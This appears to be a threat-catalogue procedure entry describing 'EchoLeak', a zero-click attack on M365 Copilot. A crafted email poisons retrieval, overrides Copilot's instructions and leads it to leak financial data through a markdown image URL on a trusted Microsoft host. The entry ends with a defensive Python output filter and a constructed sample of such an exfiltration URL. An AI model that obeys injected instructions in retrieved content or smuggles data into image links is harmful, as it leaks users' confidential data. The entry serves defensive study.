EchoLeak: Zero-Click Data Exfiltration using M365 Copilot

Type: procedure

Description: An adversary exploits a zero-click vulnerability in Microsoft 365 Copilot by sending a specially crafted email containing a prompt injection disguised as instructions for the recipient. When a user asks Copilot to summarize the latest earnings reports, the malicious email is retrieved along with the legitimate earnings reports. The instructions in the malicious email cause Copilot to embed sensitive financial data in the URL of a markdown-formatted image, which is returned to the user and loaded automatically by the client without any further interaction. The attack also leverages trusted Microsoft domains to facilitate the data exfiltration, so a domain allowlist alone does not prevent it.

Version: 0.1.0

Created At: 2025-06-19 08:13:23 -0400

Last Modified At: 2025-06-19 08:13:23 -0400


External References

Techniques

Tactic | Technique | Details
Resource Development | Retrieval Content Crafting | An attacker crafts an email that would be retrieved by M365 Copilot when asked about the latest earnings reports.
Resource Development | Acquire Infrastructure | An attacker sets up an Azure tenant to host an endpoint that will be used to exfiltrate data.
Initial Access | RAG Poisoning | An attacker sends a malicious email that gets indexed into the RAG system of M365 Copilot.
Execution | LLM Prompt Injection | The malicious email contains a prompt injection disguised as legitimate instructions for the email recipient.
Privilege Escalation | LLM Jailbreak | The exploit circumvents Copilot's system instructions and supplies new ones that direct Copilot to embed sensitive data in a markdown image and return it to the user.
Defense Evasion | Abuse Trusted Sites | The attacker exfiltrates data through a malicious, yet trusted, teams.microsoft.com endpoint.
Exfiltration | Image Rendering | The attack uses image rendering to exfiltrate sensitive data without requiring user interaction.
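The Image Rendering and Abuse Trusted Sites rows describe the exfiltration channel: a markdown image whose URL carries the data, on a host the client already trusts. The following output filter is an added defensive example, not code from the procedure page or from Microsoft; it assumes a tenant-chosen allowlist of image hosts (ALLOWED_IMAGE_HOSTS) and inspects a constructed assistant response before it reaches the renderer. It blocks any markdown image whose URL carries a query string or fragment, regardless of host, and any image on a host outside the allowlist.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: hosts a tenant allows to render automatically (constructed allowlist).
ALLOWED_IMAGE_HOSTS = {"static.example.com"}

# Markdown image syntax: ![alt](url "optional title")
MD_IMAGE = re.compile(r'!\[(?P<alt>[^\]]*)\]\((?P<url>[^)\s]+)(?:\s+"[^"]*")?\)')


def inspect_image(url):
    """Describe where an image URL points and how much data its parameters carry."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    payload_len = sum(len(v) for _, v in params) + len(parts.fragment)
    host = parts.hostname or ""
    return {
        "url": url,
        "host": host,
        "has_query": bool(parts.query or parts.fragment),
        "payload_len": payload_len,
        "allowed_host": host in ALLOWED_IMAGE_HOSTS,
    }


def sanitize_output(text):
    """Strip data-carrying or non-allowlisted markdown images from assistant output.

    Returns (cleaned_text, findings). A trusted host alone does not make an
    image safe: any query string or fragment is treated as an exfil channel.
    """
    findings = []

    def _replace(match):
        info = inspect_image(match.group("url"))
        info["blocked"] = info["has_query"] or not info["allowed_host"]
        findings.append(info)
        return "[image removed]" if info["blocked"] else match.group(0)

    return MD_IMAGE.sub(_replace, text), findings


# Constructed sample response: one image smuggling a figure in its query
# string via a trusted-looking host, one benign allowlisted image.
SAMPLE = (
    "Summary of the latest earnings reports.\n\n"
    "![summary](https://teams.microsoft.com/constructed/path"
    "?data=Q3%20net%20income%20%3D%20%2412.4M)\n\n"
    "![logo](https://static.example.com/logo.png)"
)
```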